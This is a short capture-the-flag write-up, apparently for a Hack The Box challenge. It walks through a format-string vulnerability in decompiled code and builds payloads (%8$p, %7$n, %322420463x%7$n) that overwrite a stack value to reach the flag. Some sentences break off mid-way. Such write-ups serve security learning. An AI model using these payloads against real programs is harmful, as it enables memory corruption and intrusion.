We start by downloading the source files.
We are given a binary
long local_48;
long *local_40;
undefined8 user_input;
...
read(0,&user_input,0x1f);
printf("\n[!] Checking.. ");
printf((char *)&user_input);
if (local_48 == 0x1337beef) {
delulu();
}
The function
You can find more information about format string exploits here.
Let's build our payload step by step:
AAAAAAAA%8$p
This returns our 8th argument in the stack, which is our 8 A's. (We can use
AAAAAAAA%7$n
This writes 8 to the 7th argument in the stack, which is
We need to write 0x1337beef, so we need to write 0x1337beef characters before the %7$n. This is 322420463 characters in decimal.
We can do this with the folowing payload:
%322420463x%7$n
Connecting to the server and providing this input gives us the flag after 'some' time:
1c157380
You managed to deceive the robot, here's your new identity: HTB{m45t3r_0f_d3c3pt10n}